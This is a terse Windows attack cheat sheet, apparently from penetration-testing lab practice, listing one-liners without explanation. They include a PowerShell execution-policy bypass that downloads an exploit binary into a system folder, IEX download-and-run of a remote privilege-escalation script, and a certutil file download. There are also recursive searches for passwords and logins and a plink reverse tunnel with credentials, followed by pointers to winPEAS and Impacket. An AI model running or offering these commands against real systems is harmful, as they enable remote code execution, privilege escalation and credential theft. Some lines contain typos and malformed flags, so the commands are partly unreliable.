Windows

Powershell

Searching

Get-ChildItem -Path "C:\Users\Chase\Desktop\2104firefox.dmp" -Recurse -File | Select-String login 

Download

powershell.exe -exec bypass -command "Invoke-WebRequest 'http://10.10.14.18:8888/41020.exe' -OutFile 'C:\windows\system32\spool\drivers\color\41020.exe'" 

Execution

powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.18:8888/Sherlock.ps1'); Find-AllVulns -Command 'start powershell.exe'" 

Recurse List the access file

gci  -recurse –include *.* | select Fullname 

Command Line

Search file

dir abc.txt /s /p 
findstr /i /s "password" *.* 

#Answer the promot message with "y" 
cmd.exe /c echo y | plink.exe -ssh –l username –pw password –R 

download a file

certutil.exe - urlcache -split -f http://ip/file file

Impacket

ImpacketSecureAuth

PE Tools

PEASS-ng/winPEAS/winPEASexe at master · carlospolop/PEASS-ngGitHub

Windows Privilege Escalation Guide